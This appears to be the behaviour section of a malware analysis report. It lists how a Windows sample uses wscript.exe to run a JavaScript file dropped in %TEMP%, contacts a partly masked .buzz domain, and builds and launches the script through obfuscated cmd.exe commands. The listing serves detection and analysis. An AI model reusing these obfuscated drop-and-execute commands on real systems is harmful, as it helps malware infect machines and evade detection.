Technical Information
- '<SYSTEM32>\wscript.exe' %TEMP%\5eaInxh.js
- %TEMP%\5eainxh.js
- nul
- http://w6####.oniuivby.buzz/?01#
- DNS ASK w6####.oniuivby.buzz
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p OScm5i2="%BWY:IJHMT=%%s6r8WFc:1ZTPO=/%" 0<nul 1>%TEMP%\5eaInxh%ynkv%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" md \ |"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo stArt <SYSTEM32>\wsCript.eXe %TEMP%\5eaInxh%ynkv%s"
- '<SYSTEM32>\cmd.exe'